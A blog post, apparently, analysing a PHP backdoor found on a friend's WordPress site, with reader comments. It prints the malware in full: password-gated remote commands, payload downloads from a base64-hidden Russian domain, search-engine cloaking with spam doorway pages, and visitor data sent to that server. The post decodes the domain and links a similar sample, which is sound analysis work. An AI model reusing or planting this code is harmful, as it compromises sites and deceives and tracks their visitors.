$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=strtolower(@$_SERVER["HTTP_HOST"]);
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);$urx=$host.$uri;$md5urx=md5($urx);
$xmd5="/.".$md5host."/";
$cfile="emoji1.png";
if (!@file_exists(".".$xmd5.$cfile)){
$tmppath=get_db_path();
}else{
$tmppath=".";
}
$tmppath=$tmppath.$xmd5;@mkdir($tmppath);
$configs=$tmppath.$cfile;
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";
@ini_set('memory_limit','1600M');
$domain=base64_decode("aW5kaWthdGVpdC5ydQ==");
$p="";
if ($x!="")$p=md5(@base64_decode(get_val("p")));
if (($x!="")&&($p==$md5pass)){
if ($x=="2"){
echo "###UPDATING_FILES###\n";
$ur="http://".$domain."/images/".$md5host."/";
list($buf1,$t)=@curly_page_get($ur."emoji1.png");@file_put_contents($configs,$buf1);
list($buf1,$t)=@curly_page_get($ur."metaicons.jpg");@file_put_contents($bd,$buf1);
list($buf1,$t)=@curly_page_get($ur."wp-themesall.gif");@file_put_contents($templ,$buf1);
echo "###UPDATED###\n";
exit;
}
if ($x=="4"){
echo "###WORKED###\n";exit;
}
if ($x=="5"){
$cf=array();
if (@file_exists($configs)){
$cf=@unserialize(@base64_decode(@file_get_contents($configs)));
}
$out=array(
'cf' => $cf,
'server' => $_SERVER,
'file' => __FILE__,
'configfile' => $configs,
'db_file_size' => is_file($bd) ? filesize($bd) : 0,
'template_file_size' => is_file($templ) ? filesize($templ) : 0,
);
echo base64_encode(serialize($out));
exit;
}
}else{
$cf=array();
if (@file_exists($configs)){
$cf=@unserialize(@base64_decode(@file_get_contents($configs)));
}
if (@isset($cf[$md5urx])){
$bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
$off=$cf[$md5urx]+0;
$template=@base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f));@fclose($f);$info=unserialize(base64_decode($buf));
$keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
if ($bot) {
if (isset($info["contenttype"])){$contenttype=@base64_decode($info["contenttype"]);$types=explode("\n",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}
if (isset($info["isdoor"])){
if (isset($info["standalone"])){
$doorcontent=base64_decode($text);
echo $doorcontent;exit;
}else{
if ((isset($info["nr"]))&&(is_array($info["nr"]))){
foreach($info["nr"] as $mark => $repl){
$template=str_replace($mark,$repl,$template);
}
}else{
$template=str_replace("%text%",$text,$template);
$template=str_replace("%title%",$title,$template);
$template=str_replace("%description%",$description,$template);
$template=str_replace("%uckeyword%",$uckeyword,$template);
$template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);
foreach($inside_links as $i => $link){
$template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
}
}
echo $template;exit;
}
}else{
list($buf,$ct)=get_proxy_page();
if (stristr($ct,"text/html")){
$rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
$links=$info["links_a"];
$buf=change_page_regex($buf,$links,$rega,$resa);
$regp='/(.{30}\<\/p\>)/is';$resp=1;
$links=$info["links_p"];
$buf=change_page_regex($buf,$links,$regp,$resp);
}
echo $buf;exit;
}
}
if ($se) {
if (isset($info["isdoor"])){
list($buf,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
}else{
list($buf,$ct)=get_proxy_page();
}
echo $buf;exit;
}
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;exit;
}
}
Immediately, I notice $domain
which is a base64 encoded string, which when decoded gives:
indikateit.ru
I'm guessing this is the server which the allegedly malcious scripts post information to.
This decoded base64 script references $_COOKIE
, $_SERVER
& $_REQUEST
, the same variables which the first file referenced.
Update: Upon googling some of the base64 decoded code, I found a link on UnPHP of someone who deobfuscated similar code
However, the domain in this one was hlemovka.ru
Top comments (3)
Nice job!
I've a question: how does this code ended up on the server of your friend?
For now, my conclusion is: don't use Wordpress. I've so many requests on my server trying to connect to the Wordpress admin (even if my website is not a wordpress), it's insane.
Thanks for the comment.
My friend thinks it may be to do with his comment fields: potentially not sanitizing inputs.
Just noticed this issue on our own site. Might want to check the web.config file too.
boyet.com/blog/godaddy-shared-wind...